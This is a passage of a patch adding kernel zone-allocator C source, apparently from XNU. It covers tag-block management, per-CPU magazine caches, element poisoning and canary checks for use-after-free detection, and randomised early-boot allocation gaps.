+    ztBlocks[ztBlocks[(idx)].prev].next = ztBlocks[(idx)].next;     \
+    ztBlocks[ztBlocks[(idx)].next].prev = ztBlocks[(idx)].prev;
+
+static void
+ztFree(zone_t zone __unused, uint32_t index, uint32_t count)
+{
+       uint32_t q, w, p, size, merge;
+
+       assert(count);
+       ztBlocksFree += count;
+
+       // merge with preceding
+       merge = (index + count);
+       if ((merge < ztBlocksCount)
+           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
+           && ztBlocks[merge].free) {
+               ZTBDEQ(merge);
+               count += ztBlocks[merge].size;
+       }
+
+       // merge with following
+       merge = (index - 1);
+       if ((merge > ztFreeIndexMax)
+           && ztPresent(&ztBlocks[merge], sizeof(ztBlocks[merge]))
+           && ztBlocks[merge].free) {
+               size = ztBlocks[merge].size;
+               count += size;
+               index -= size;
+               ZTBDEQ(index);
+       }
+
+       q = ztLog2down(count);
+       if (q > ztFreeIndexMax) {
+               q = ztFreeIndexMax;
+       }
+       w = q;
+       // queue in order of size
+       while (TRUE) {
+               p = ztBlocks[w].next;
+               if (p == q) {
+                       break;
+               }
+               if (ztBlocks[p].size >= count) {
+                       break;
+               }
+               w = p;
+       }
+       ztBlocks[p].prev = index;
+       ztBlocks[w].next = index;
+
+       // fault in first
+       ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
+
+       // mark first & last with free flag and size
+       ztBlocks[index].free = TRUE;
+       ztBlocks[index].size = count;
+       ztBlocks[index].prev = w;
+       ztBlocks[index].next = p;
+       if (count > 1) {
+               index += (count - 1);
+               // fault in last
+               ztFault(zone_tags_map, &ztBlocks[index], sizeof(ztBlocks[index]), 0);
+               ztBlocks[index].free = TRUE;
+               ztBlocks[index].size = count;
+       }
+}
+
+static uint32_t
+ztAlloc(zone_t zone, uint32_t count)
+{
+       uint32_t q, w, p, leftover;
+
+       assert(count);
+
+       q = ztLog2up(count);
+       if (q > ztFreeIndexMax) {
+               q = ztFreeIndexMax;
+       }
+       do{
+               w = q;
+               while (TRUE) {
+                       p = ztBlocks[w].next;
+                       if (p == q) {
+                               break;
+                       }
+                       if (ztBlocks[p].size >= count) {
+                               // dequeue, mark both ends allocated
+                               ztBlocks[w].next = ztBlocks[p].next;
+                               ztBlocks[ztBlocks[p].next].prev = w;
+                               ztBlocks[p].free = FALSE;
+                               ztBlocksFree -= ztBlocks[p].size;
+                               if (ztBlocks[p].size > 1) {
+                                       ztBlocks[p + ztBlocks[p].size - 1].free = FALSE;
+                               }
+
+                               // fault all the allocation
+                               ztFault(zone_tags_map, &ztBlocks[p], count * sizeof(ztBlocks[p]), 0);
+                               // mark last as allocated
+                               if (count > 1) {
+                                       ztBlocks[p + count - 1].free = FALSE;
+                               }
+                               // free remainder
+                               leftover = ztBlocks[p].size - count;
+                               if (leftover) {
+                                       ztFree(zone, p + ztBlocks[p].size - leftover, leftover);
+                               }
+
+                               return p;
+                       }
+                       w = p;
+               }
+               q++;
+       }while (q <= ztFreeIndexMax);
+
+       return -1U;
+}
+
+__startup_func
+static void
+zone_tagging_init(vm_size_t max_zonemap_size)
+{
+       kern_return_t         ret;
+       vm_map_kernel_flags_t vmk_flags;
+       uint32_t              idx;
+
+       // allocate submaps VM_KERN_MEMORY_DIAG
+
+       zone_tagbase_map_size = atop(max_zonemap_size) * sizeof(uint32_t);
+       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
+       ret = kmem_suballoc(kernel_map, &zone_tagbase_min, zone_tagbase_map_size,
+           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
+           &zone_tagbase_map);
+
+       if (ret != KERN_SUCCESS) {
+               panic("zone_init: kmem_suballoc failed");
+       }
+       zone_tagbase_max = zone_tagbase_min + round_page(zone_tagbase_map_size);
+
+       zone_tags_map_size = 2048 * 1024 * sizeof(vm_tag_t);
+       vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
+       ret = kmem_suballoc(kernel_map, &zone_tags_min, zone_tags_map_size,
+           FALSE, VM_FLAGS_ANYWHERE, vmk_flags, VM_KERN_MEMORY_DIAG,
+           &zone_tags_map);
+
+       if (ret != KERN_SUCCESS) {
+               panic("zone_init: kmem_suballoc failed");
+       }
+       zone_tags_max = zone_tags_min + round_page(zone_tags_map_size);
+
+       ztBlocks = (ztBlock *) zone_tags_min;
+       ztBlocksCount = (uint32_t)(zone_tags_map_size / sizeof(ztBlock));
+
+       // initialize the qheads
+       lck_mtx_lock(&ztLock);
+
+       ztFault(zone_tags_map, &ztBlocks[0], sizeof(ztBlocks[0]), 0);
+       for (idx = 0; idx < ztFreeIndexCount; idx++) {
+               ztBlocks[idx].free = TRUE;
+               ztBlocks[idx].next = idx;
+               ztBlocks[idx].prev = idx;
+               ztBlocks[idx].size = 0;
+       }
+       // free remaining space
+       ztFree(NULL, ztFreeIndexCount, ztBlocksCount - ztFreeIndexCount);
+
+       lck_mtx_unlock(&ztLock);
+}
+
+static void
+ztMemoryAdd(zone_t zone, vm_offset_t mem, vm_size_t size)
+{
+       uint32_t * tagbase;
+       uint32_t   count, block, blocks, idx;
+       size_t     pages;
+
+       pages = atop(size);
+       tagbase = ZTAGBASE(zone, mem);
+
+       lck_mtx_lock(&ztLock);
+
+       // fault tagbase
+       ztFault(zone_tagbase_map, tagbase, pages * sizeof(uint32_t), 0);
+
+       if (!zone->tags_inline) {
+               // allocate tags
+               count = (uint32_t)(size / zone_elem_size(zone));
+               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
+               block = ztAlloc(zone, blocks);
+               if (-1U == block) {
+                       ztDump(false);
+               }
+               assert(-1U != block);
+       }
+
+       lck_mtx_unlock(&ztLock);
+
+       if (!zone->tags_inline) {
+               // set tag base for each page
+               block *= ztTagsPerBlock;
+               for (idx = 0; idx < pages; idx++) {
+                       vm_offset_t esize = zone_elem_size(zone);
+                       tagbase[idx] = block + (uint32_t)((ptoa(idx) + esize - 1) / esize);
+               }
+       }
+}
+
+static void
+ztMemoryRemove(zone_t zone, vm_offset_t mem, vm_size_t size)
+{
+       uint32_t * tagbase;
+       uint32_t   count, block, blocks, idx;
+       size_t     pages;
+
+       // set tag base for each page
+       pages = atop(size);
+       tagbase = ZTAGBASE(zone, mem);
+       block = tagbase[0];
+       for (idx = 0; idx < pages; idx++) {
+               tagbase[idx] = 0xFFFFFFFF;
+       }
+
+       lck_mtx_lock(&ztLock);
+       if (!zone->tags_inline) {
+               count = (uint32_t)(size / zone_elem_size(zone));
+               blocks = ((count + ztTagsPerBlock - 1) / ztTagsPerBlock);
+               assert(block != 0xFFFFFFFF);
+               block /= ztTagsPerBlock;
+               ztFree(NULL /* zone is unlocked */, block, blocks);
+       }
+
+       lck_mtx_unlock(&ztLock);
+}
+
+uint32_t
+zone_index_from_tag_index(uint32_t tag_zone_index, vm_size_t * elem_size)
+{
+       simple_lock(&all_zones_lock, &zone_locks_grp);
+
+       zone_index_foreach(idx) {
+               zone_t z = &zone_array[idx];
+               if (!z->tags) {
+                       continue;
+               }
+               if (tag_zone_index != z->tag_zone_index) {
+                       continue;
+               }
+
+               *elem_size = zone_elem_size(z);
+               simple_unlock(&all_zones_lock);
+               return idx;
+       }
+
+       simple_unlock(&all_zones_lock);
+
+       return -1U;
+}
+
+#endif /* VM_MAX_TAG_ZONES */
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc helpers
+#if !ZALLOC_TEST
+
+__pure2
+static inline uint16_t
+zc_mag_size(void)
+{
+       return zc_magazine_size;
+}
+
+__attribute__((noinline, cold))
+static void
+zone_lock_was_contended(zone_t zone, zone_cache_t zc)
+{
+       lck_spin_lock_nopreempt(&zone->z_lock);
+
+       /*
+        * If zone caching has been disabled due to memory pressure,
+        * then recording contention is not useful, give the system
+        * time to recover.
+        */
+       if (__improbable(zone_caching_disabled)) {
+               return;
+       }
+
+       zone->z_contention_cur++;
+
+       if (zc == NULL || zc->zc_depot_max >= INT16_MAX * zc_mag_size()) {
+               return;
+       }
+
+       /*
+        * Let the depot grow based on how bad the contention is,
+        * and how populated the zone is.
+        */
+       if (zone->z_contention_wma < 2 * Z_CONTENTION_WMA_UNIT) {
+               if (zc->zc_depot_max * zpercpu_count() * 20u >=
+                   zone->z_elems_avail) {
+                       return;
+               }
+       }
+       if (zone->z_contention_wma < 4 * Z_CONTENTION_WMA_UNIT) {
+               if (zc->zc_depot_max * zpercpu_count() * 10u >=
+                   zone->z_elems_avail) {
+                       return;
+               }
+       }
+       if (!zc_grow_threshold || zone->z_contention_wma <
+           zc_grow_threshold * Z_CONTENTION_WMA_UNIT) {
+               return;
+       }
+
+       zc->zc_depot_max++;
+}
+
+static inline void
+zone_lock_nopreempt_check_contention(zone_t zone, zone_cache_t zc)
+{
+       if (lck_spin_try_lock_nopreempt(&zone->z_lock)) {
+               return;
+       }
+
+       zone_lock_was_contended(zone, zc);
+}
+
+static inline void
+zone_lock_check_contention(zone_t zone, zone_cache_t zc)
+{
+       disable_preemption();
+       zone_lock_nopreempt_check_contention(zone, zc);
+}
+
+static inline void
+zone_unlock_nopreempt(zone_t zone)
+{
+       lck_spin_unlock_nopreempt(&zone->z_lock);
+}
+
+static inline void
+zone_depot_lock_nopreempt(zone_cache_t zc)
+{
+       hw_lock_bit_nopreempt(&zc->zc_depot_lock, 0, &zone_locks_grp);
+}
+
+static inline void
+zone_depot_unlock_nopreempt(zone_cache_t zc)
+{
+       hw_unlock_bit_nopreempt(&zc->zc_depot_lock, 0);
+}
+
+static inline void
+zone_depot_lock(zone_cache_t zc)
+{
+       hw_lock_bit(&zc->zc_depot_lock, 0, &zone_locks_grp);
+}
+
+static inline void
+zone_depot_unlock(zone_cache_t zc)
+{
+       hw_unlock_bit(&zc->zc_depot_lock, 0);
+}
+
+const char *
+zone_name(zone_t z)
+{
+       return z->z_name;
+}
+
+const char *
+zone_heap_name(zone_t z)
+{
+       if (__probable(z->kalloc_heap < KHEAP_ID_COUNT)) {
+               return kalloc_heap_names[z->kalloc_heap];
+       }
+       return "invalid";
+}
+
+static uint32_t
+zone_alloc_pages_for_nelems(zone_t z, vm_size_t max_elems)
+{
+       vm_size_t elem_count, chunks;
+
+       elem_count = ptoa(z->z_percpu ? 1 : z->z_chunk_pages) / zone_elem_size(z);
+       chunks = (max_elems + elem_count - 1) / elem_count;
+
+       return (uint32_t)MIN(UINT32_MAX, chunks * z->z_chunk_pages);
+}
+
+static inline vm_size_t
+zone_submaps_approx_size(void)
+{
+       vm_size_t size = 0;
+
+       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
+               size += zone_submaps[idx]->size;
+       }
+
+       return size;
+}
+
+static void
+zone_cache_swap_magazines(zone_cache_t cache)
+{
+       uint16_t count_a = cache->zc_alloc_cur;
+       uint16_t count_f = cache->zc_free_cur;
+       zone_element_t *elems_a = cache->zc_alloc_elems;
+       zone_element_t *elems_f = cache->zc_free_elems;
+
+       z_debug_assert(count_a <= zc_mag_size());
+       z_debug_assert(count_f <= zc_mag_size());
+
+       cache->zc_alloc_cur = count_f;
+       cache->zc_free_cur = count_a;
+       cache->zc_alloc_elems = elems_f;
+       cache->zc_free_elems = elems_a;
+}
+
+/*!
+ * @function zone_magazine_load
+ *
+ * @brief
+ * Cache the value of @c zm_cur on the cache to avoid a dependent load
+ * on the allocation fastpath.
+ */
+static void
+zone_magazine_load(uint16_t *count, zone_element_t **elems, zone_magazine_t mag)
+{
+       z_debug_assert(mag->zm_cur <= zc_mag_size());
+       *count = mag->zm_cur;
+       *elems = mag->zm_elems;
+}
+
+/*!
+ * @function zone_magazine_replace
+ *
+ * @brief
+ * Unlod a magazine and load a new one instead.
+ */
+static zone_magazine_t
+zone_magazine_replace(uint16_t *count, zone_element_t **elems,
+    zone_magazine_t mag)
+{
+       zone_magazine_t old;
+
+       old = (zone_magazine_t)((uintptr_t)*elems -
+           offsetof(struct zone_magazine, zm_elems));
+       old->zm_cur = *count;
+       z_debug_assert(old->zm_cur <= zc_mag_size());
+       zone_magazine_load(count, elems, mag);
+
+       return old;
+}
+
+static zone_magazine_t
+zone_magazine_alloc(zalloc_flags_t flags)
+{
+       return zalloc_ext(zc_magazine_zone, zc_magazine_zone->z_stats,
+                  flags | Z_ZERO);
+}
+
+static void
+zone_magazine_free(zone_magazine_t mag)
+{
+       zfree_ext(zc_magazine_zone, zc_magazine_zone->z_stats, mag);
+}
+
+static void
+zone_enable_caching(zone_t zone)
+{
+       zone_cache_t caches;
+
+       caches = zalloc_percpu_permanent_type(struct zone_cache);
+       zpercpu_foreach(zc, caches) {
+               zone_magazine_load(&zc->zc_alloc_cur, &zc->zc_alloc_elems,
+                   zone_magazine_alloc(Z_WAITOK | Z_NOFAIL));
+               zone_magazine_load(&zc->zc_free_cur, &zc->zc_free_elems,
+                   zone_magazine_alloc(Z_WAITOK | Z_NOFAIL));
+               STAILQ_INIT(&zc->zc_depot);
+       }
+
+       if (os_atomic_xchg(&zone->z_pcpu_cache, caches, release)) {
+               panic("allocating caches for zone %s twice", zone->z_name);
+       }
+}
+
+bool
+zone_maps_owned(vm_address_t addr, vm_size_t size)
+{
+       return from_zone_map(addr, size, ZONE_ADDR_NATIVE);
+}
+
+void
+zone_map_sizes(
+       vm_map_size_t    *psize,
+       vm_map_size_t    *pfree,
+       vm_map_size_t    *plargest_free)
+{
+       vm_map_size_t size, free, largest;
+
+       vm_map_sizes(zone_submaps[0], psize, pfree, plargest_free);
+
+       for (uint32_t i = 1; i <= zone_last_submap_idx; i++) {
+               vm_map_sizes(zone_submaps[i], &size, &free, &largest);
+               *psize += size;
+               *pfree += free;
+               *plargest_free = MAX(*plargest_free, largest);
+       }
+}
+
+__attribute__((always_inline))
+vm_map_t
+zone_submap(zone_t zone)
+{
+       return zone_submaps[zone->z_submap_idx];
+}
+
+unsigned
+zpercpu_count(void)
+{
+       return zpercpu_early_count;
+}
+
+int
+track_this_zone(const char *zonename, const char *logname)
+{
+       unsigned int len;
+       const char *zc = zonename;
+       const char *lc = logname;
+
+       /*
+        * Compare the strings.  We bound the compare by MAX_ZONE_NAME.
+        */
+
+       for (len = 1; len <= MAX_ZONE_NAME; zc++, lc++, len++) {
+               /*
+                * If the current characters don't match, check for a space in
+                * in the zone name and a corresponding period in the log name.
+                * If that's not there, then the strings don't match.
+                */
+
+               if (*zc != *lc && !(*zc == ' ' && *lc == '.')) {
+                       break;
+               }
+
+               /*
+                * The strings are equal so far.  If we're at the end, then it's a match.
+                */
+
+               if (*zc == '\0') {
+                       return TRUE;
+               }
+       }
+
+       return FALSE;
+}
+
+#if DEBUG || DEVELOPMENT
+
+vm_size_t
+zone_element_info(void *addr, vm_tag_t * ptag)
+{
+       vm_size_t     size = 0;
+       vm_tag_t      tag = VM_KERN_MEMORY_NONE;
+       struct zone *src_zone;
+
+       if (from_zone_map(addr, sizeof(void *), ZONE_ADDR_NATIVE) ||
+           from_zone_map(addr, sizeof(void *), ZONE_ADDR_FOREIGN)) {
+               src_zone = &zone_array[zone_index_from_ptr(addr)];
+#if VM_MAX_TAG_ZONES
+               if (__improbable(src_zone->tags)) {
+                       tag = *ztSlot(src_zone, (vm_offset_t)addr) >> 1;
+               }
+#endif /* VM_MAX_TAG_ZONES */
+               size = zone_elem_size(src_zone);
+       } else {
+#if CONFIG_GZALLOC
+               gzalloc_element_size(addr, NULL, &size);
+#endif /* CONFIG_GZALLOC */
+       }
+       *ptag = tag;
+       return size;
+}
+
+#endif /* DEBUG || DEVELOPMENT */
+
+/* The backup pointer is stored in the last pointer-sized location in an element. */
+__header_always_inline vm_offset_t *
+get_primary_ptr(vm_offset_t elem)
+{
+       return (vm_offset_t *)elem;
+}
+
+__header_always_inline vm_offset_t *
+get_backup_ptr(vm_offset_t elem, vm_size_t elem_size)
+{
+       return (vm_offset_t *)(elem + elem_size - sizeof(vm_offset_t));
+}
+
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone poisoning/zeroing and early random
+#if !ZALLOC_TEST
+
+#define ZONE_ENTROPY_CNT 2
+static struct zone_bool_gen {
+       struct bool_gen zbg_bg;
+       uint32_t zbg_entropy[ZONE_ENTROPY_CNT];
+} zone_bool_gen[MAX_CPUS];
+
+/*
+ * Initialize zone poisoning
+ * called from zone_bootstrap before any allocations are made from zalloc
+ */
+__startup_func
+static void
+zp_bootstrap(void)
+{
+       char temp_buf[16];
+
+       /*
+        * Initialize canary random cookie.
+        *
+        * Make sure that (zp_canary ^ pointer) have non zero low bits (01)
+        * different from ZONE_POISON (11).
+        *
+        * On LP64, have (zp_canary ^ pointer) have the high bits equal 0xC0FFEE...
+        */
+       static_assert(ZONE_POISON % 4 == 3);
+       zp_canary = (uintptr_t)early_random();
+#if __LP64__
+       zp_canary &= 0x000000fffffffffc;
+       zp_canary |= 0xc0ffee0000000001 ^ 0xffffff0000000000;
+#else
+       zp_canary &= 0xfffffffc;
+       zp_canary |= 0x00000001;
+#endif
+
+       /* -zp: enable poisoning for every alloc and free */
+       if (PE_parse_boot_argn("-zp", temp_buf, sizeof(temp_buf))) {
+               zp_factor = 1;
+       }
+
+       /* -no-zp: disable poisoning */
+       if (PE_parse_boot_argn("-no-zp", temp_buf, sizeof(temp_buf))) {
+               zp_factor = 0;
+               printf("Zone poisoning disabled\n");
+       }
+
+       zpercpu_foreach_cpu(cpu) {
+               random_bool_init(&zone_bool_gen[cpu].zbg_bg);
+       }
+}
+
+static inline uint32_t
+zone_poison_count_init(zone_t zone)
+{
+       return zp_factor + (((uint32_t)zone_elem_size(zone)) >> zp_scale) ^
+              (mach_absolute_time() & 0x7);
+}
+
+/*
+ * Zero the element if zone has z_free_zeroes flag set else poison
+ * the element if zs_poison_seqno hits 0.
+ */
+static zprot_mode_t
+zfree_clear_or_poison(zone_t zone, vm_offset_t addr, vm_offset_t elem_size)
+{
+       if (zone->z_free_zeroes) {
+               if (zone->z_percpu) {
+                       zpercpu_foreach_cpu(i) {
+                               bzero((void *)(addr + ptoa(i)), elem_size);
+                       }
+               } else {
+                       bzero((void *)addr, elem_size);
+               }
+               return ZPM_ZERO;
+       }
+
+       zprot_mode_t poison = ZPM_AUTO;
+#if ZALLOC_ENABLE_POISONING
+       if (__improbable(zp_factor == 1)) {
+               poison = ZPM_POISON;
+       } else if (__probable(zp_factor != 0)) {
+               uint32_t *seqnop = &zpercpu_get(zone->z_stats)->zs_poison_seqno;
+               uint32_t seqno = os_atomic_load(seqnop, relaxed);
+               if (seqno == 0) {
+                       os_atomic_store(seqnop, zone_poison_count_init(zone), relaxed);
+                       poison = ZPM_POISON;
+               } else {
+                       os_atomic_store(seqnop, seqno - 1, relaxed);
+               }
+       }
+       if (poison == ZPM_POISON) {
+               /* memset_pattern{4|8} could help make this faster: <rdar://problem/4662004> */
+               for (size_t i = 0; i < elem_size / sizeof(vm_offset_t); i++) {
+                       ((vm_offset_t *)addr)[i] = ZONE_POISON;
+               }
+       } else {
+               /*
+                * Set a canary at the extremities.
+                *
+                * Zero first zp_min_size bytes of elements that aren't being
+                * poisoned.
+                *
+                * Element size is larger than zp_min_size in this path,
+                * zones with smaller elements have z_free_zeroes set.
+                */
+               *get_primary_ptr(addr) = zp_canary ^ (uintptr_t)addr;
+               bzero((void *)addr + sizeof(vm_offset_t),
+                   zp_min_size - sizeof(vm_offset_t));
+               *get_backup_ptr(addr, elem_size) = zp_canary ^ (uintptr_t)addr;
+
+               poison = ZPM_CANARY;
+       }
+#endif /* ZALLOC_ENABLE_POISONING */
+
+       return poison;
+}
+
+#if ZALLOC_ENABLE_POISONING
+
+__abortlike
+static void
+zalloc_uaf_panic(zone_t z, uintptr_t elem, size_t size, zprot_mode_t zpm)
+{
+       uint32_t esize = (uint32_t)zone_elem_size(z);
+       uint32_t first_offs = ~0u;
+       uintptr_t first_bits = 0, v;
+       char buf[1024];
+       int pos = 0;
+       const char *how;
+
+#if __LP64__
+#define ZPF  "0x%016lx"
+#else
+#define ZPF  "0x%08lx"
+#endif
+
+       buf[0] = '\0';
+
+       if (zpm == ZPM_CANARY) {
+               how = "canaries";
+
+               v = *get_primary_ptr(elem);
+               if (v != (elem ^ zp_canary)) {
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: got "ZPF", want "ZPF" (xor: "ZPF")",
+                           0, v, (elem ^ zp_canary), (v ^ elem ^ zp_canary));
+                       if (first_offs > 0) {
+                               first_offs = 0;
+                               first_bits = v;
+                       }
+               }
+
+               v = *get_backup_ptr(elem, esize);
+               if (v != (elem ^ zp_canary)) {
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: got "ZPF", want "ZPF" (xor: "ZPF")",
+                           esize - (int)sizeof(v), v, (elem ^ zp_canary),
+                           (v ^ elem ^ zp_canary));
+                       if (first_offs > esize - sizeof(v)) {
+                               first_offs = esize - sizeof(v);
+                               first_bits = v;
+                       }
+               }
+
+               for (uint32_t o = sizeof(v); o < zp_min_size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == 0) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF, o, v);
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       } else if (zpm == ZPM_ZERO) {
+               how = "zero";
+
+               for (uint32_t o = 0; o < size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == 0) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF, o, v);
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       } else {
+               how = "poison";
+
+               for (uint32_t o = 0; o < size; o += sizeof(v)) {
+                       if ((v = *(uintptr_t *)(elem + o)) == ZONE_POISON) {
+                               continue;
+                       }
+                       pos += scnprintf(buf + pos, sizeof(buf) - pos, "\n"
+                           "%5d: "ZPF" (xor: "ZPF")",
+                           o, v, (v ^ ZONE_POISON));
+                       if (first_offs > o) {
+                               first_offs = o;
+                               first_bits = v;
+                       }
+               }
+       }
+
+       (panic)("[%s%s]: element modified after free "
+       "(off:%d, val:"ZPF", sz:%d, ptr:%p, prot:%s)%s",
+       zone_heap_name(z), zone_name(z),
+       first_offs, first_bits, esize, (void *)elem, how, buf);
+
+#undef ZPF
+}
+
+static void
+zalloc_validate_element_zero(zone_t zone, vm_offset_t elem, vm_size_t size)
+{
+       if (memcmp_zero_ptr_aligned((void *)elem, size)) {
+               zalloc_uaf_panic(zone, elem, size, ZPM_ZERO);
+       }
+       if (!zone->z_percpu) {
+               return;
+       }
+       for (size_t i = zpercpu_count(); --i > 0;) {
+               elem += PAGE_SIZE;
+               if (memcmp_zero_ptr_aligned((void *)elem, size)) {
+                       zalloc_uaf_panic(zone, elem, size, ZPM_ZERO);
+               }
+       }
+}
+
+#if __arm64__ || __arm__
+typedef __attribute__((ext_vector_type(2))) vm_offset_t zpair_t;
+#else
+typedef struct {
+       vm_offset_t x;
+       vm_offset_t y;
+} zpair_t;
+#endif
+
+
+__attribute__((noinline))
+static void
+zalloc_validate_element_poison(zone_t zone, vm_offset_t elem, vm_size_t size)
+{
+       vm_offset_t p = elem;
+       vm_offset_t end = elem + size;
+
+       const zpair_t poison = { ZONE_POISON, ZONE_POISON };
+       zpair_t a, b;
+
+       a.x = *(const vm_offset_t *)p;
+       a.y = *(const vm_offset_t *)(end - sizeof(vm_offset_t));
+
+       a.x ^= poison.x;
+       a.y ^= poison.y;
+
+       /*
+        * align p to the next double-wide boundary
+        * align end to the previous double-wide boundary
+        */
+       p = (p + sizeof(zpair_t) - 1) & -sizeof(zpair_t);
+       end &= -sizeof(zpair_t);
+
+       if ((end - p) % (2 * sizeof(zpair_t)) == 0) {
+               b.y = 0;
+               b.y = 0;
+       } else {
+               end -= sizeof(zpair_t);
+               b.x = ((zpair_t *)end)[0].x ^ poison.x;
+               b.y = ((zpair_t *)end)[0].y ^ poison.y;
+       }
+
+       for (; p < end; p += 2 * sizeof(zpair_t)) {
+               a.x |= ((zpair_t *)p)[0].x ^ poison.x;
+               a.y |= ((zpair_t *)p)[0].y ^ poison.y;
+               b.x |= ((zpair_t *)p)[1].x ^ poison.x;
+               b.y |= ((zpair_t *)p)[1].y ^ poison.y;
+       }
+
+       a.x |= b.x;
+       a.y |= b.y;
+
+       if (a.x || a.y) {
+               zalloc_uaf_panic(zone, elem, size, ZPM_POISON);
+       }
+}
+
+static void
+zalloc_validate_element(zone_t zone, vm_offset_t elem, vm_size_t size,
+    zprot_mode_t zpm)
+{
+       vm_offset_t *primary = get_primary_ptr(elem);
+       vm_offset_t *backup  = get_backup_ptr(elem, size);
+
+#if CONFIG_GZALLOC
+       if (zone->gzalloc_tracked) {
+               return;
+       }
+#endif /* CONFIG_GZALLOC */
+
+       if (zone->z_free_zeroes) {
+               return zalloc_validate_element_zero(zone, elem, size);
+       }
+
+       switch (zpm) {
+       case ZPM_AUTO:
+               if (*backup == 0) {
+                       size -= sizeof(vm_size_t);
+                       return zalloc_validate_element_zero(zone, elem, size);
+               }
+               if (*backup == ZONE_POISON) {
+                       size -= sizeof(vm_size_t);
+                       return zalloc_validate_element_poison(zone, elem, size);
+               }
+               OS_FALLTHROUGH;
+
+       case ZPM_CANARY:
+               if ((*primary ^ zp_canary) != elem || (*backup ^ zp_canary) != elem) {
+                       zalloc_uaf_panic(zone, elem, size, ZPM_CANARY);
+               }
+               *primary = *backup = 0;
+               size = zp_min_size;
+               OS_FALLTHROUGH;
+
+       case ZPM_ZERO:
+               return zalloc_validate_element_zero(zone, elem, size);
+
+       case ZPM_POISON:
+               return zalloc_validate_element_poison(zone, elem, size);
+       }
+}
+
+#endif /* ZALLOC_ENABLE_POISONING */
+#if ZALLOC_EARLY_GAPS
+
+__attribute__((noinline))
+static void
+zone_early_gap_drop(int n)
+{
+       while (n-- > 0) {
+               zone_t zone0 = &zone_array[0];
+               struct zone_page_metadata *meta = NULL;
+               vm_offset_t addr;
+               uint16_t pages;
+               vm_map_t map;
+
+               lck_mtx_lock(&zone_metadata_region_lck);
+
+               if (!zone_pva_is_null(zone0->z_pageq_va)) {
+                       meta = zone_meta_queue_pop_native(zone0,
+                           &zone0->z_pageq_va, &addr);
+                       map = zone_submaps[meta->zm_chunk_len];
+                       pages = meta->zm_alloc_size;
+                       __builtin_bzero(meta, sizeof(struct zone_page_metadata));
+               }
+
+               lck_mtx_unlock(&zone_metadata_region_lck);
+
+               if (!meta) {
+                       break;
+               }
+
+               kmem_free(map, addr, ptoa(pages));
+       }
+}
+
+static void
+zone_early_gap_add(zone_t z, uint16_t pages)
+{
+       struct zone_page_metadata *meta = NULL;
+       zone_t zone0 = &zone_array[0];
+       kern_return_t kr;
+       vm_offset_t addr;
+
+       kma_flags_t kmaflags = KMA_KOBJECT | KMA_ZERO | KMA_VAONLY;
+       if (z->z_submap_idx == Z_SUBMAP_IDX_GENERAL &&
+           z->kalloc_heap != KHEAP_ID_NONE) {
+               kmaflags |= KMA_KHEAP;
+       }
+
+       kr = kernel_memory_allocate(zone_submap(z), &addr, ptoa(pages), 0,
+           kmaflags, VM_KERN_MEMORY_ZONE);
+
+       if (kr != KERN_SUCCESS) {
+               panic("unable to allocate early gap (%d pages): %d", pages, kr);
+       }
+
+       zone_meta_populate(addr, ptoa(pages));
+
+       meta = zone_meta_from_addr(addr);
+       meta->zm_alloc_size = pages;
+       meta->zm_chunk_len = z->z_submap_idx;
+
+       lck_mtx_lock(&zone_metadata_region_lck);
+       zone_meta_queue_push(zone0, &zone0->z_pageq_va, meta);
+       lck_mtx_unlock(&zone_metadata_region_lck);
+}
+
+/*
+ * Roughly until pd1 is made, introduce random gaps
+ * between allocated pages.
+ *
+ * This way the early boot allocations are not in a completely
+ * predictible order and relative position.
+ *
+ * Those gaps are returned to the maps afterwards.
+ *
+ * We abuse the zone 0 (which is unused) "va" pageq to remember
+ * those ranges.
+ */
+__attribute__((noinline))
+static void
+zone_allocate_random_early_gap(zone_t z)
+{
+       int16_t pages = early_random() % 16;
+
+       /*
+        * 6%  of the time: drop 2 gaps
+        * 25% of the time: drop 1 gap
+        * 37% of the time: do nothing
+        * 18% of the time: add 1 gap
+        * 12% of the time: add 2 gaps
+        */
+       if (pages > 10) {
+               zone_early_gap_drop(pages == 15 ? 2 : 1);
+       }
+       if (pages < 5) {
+               /* values are 6 through 16 */
+               zone_early_gap_add(z, 6 + 2 * pages);
+       }
+       if (pages < 2) {
+               zone_early_gap_add(z, 6 + early_random() % 16);
+       }
+}
+
+static inline void
+zone_cleanup_early_gaps_if_needed(void)
+{
+       if (__improbable(!zone_pva_is_null(zone_array[0].z_pageq_va))) {
+               zone_early_gap_drop(10);
+       }
+}
+
+#endif /* ZALLOC_EARLY_GAPS */
+
+static void
+zone_early_scramble_rr(zone_t zone, zone_stats_t zstats)
+{
+       int cpu = cpu_number();
+       zone_stats_t zs = zpercpu_get_cpu(zstats, cpu);
+       uint32_t bits;
+
+       bits = random_bool_gen_bits(&zone_bool_gen[cpu].zbg_bg,
+           zone_bool_gen[cpu].zbg_entropy, ZONE_ENTROPY_CNT, 8);
+
+       zs->zs_alloc_rr += bits;
+       zs->zs_alloc_rr %= zone->z_chunk_elems;
+}
+
+#endif /* !ZALLOC_TEST */
+#pragma mark Zone Leak Detection
+#if !ZALLOC_TEST
+
+/*
+ * Zone leak debugging code
+ *
+ * When enabled, this code keeps a log to track allocations to a particular zone that have not
+ * yet been freed.  Examining this log will reveal the source of a zone leak.  The log is allocated
+ * only when logging is enabled, so there is no effect on the system when it's turned off.  Logging is
+ * off by default.
+ *
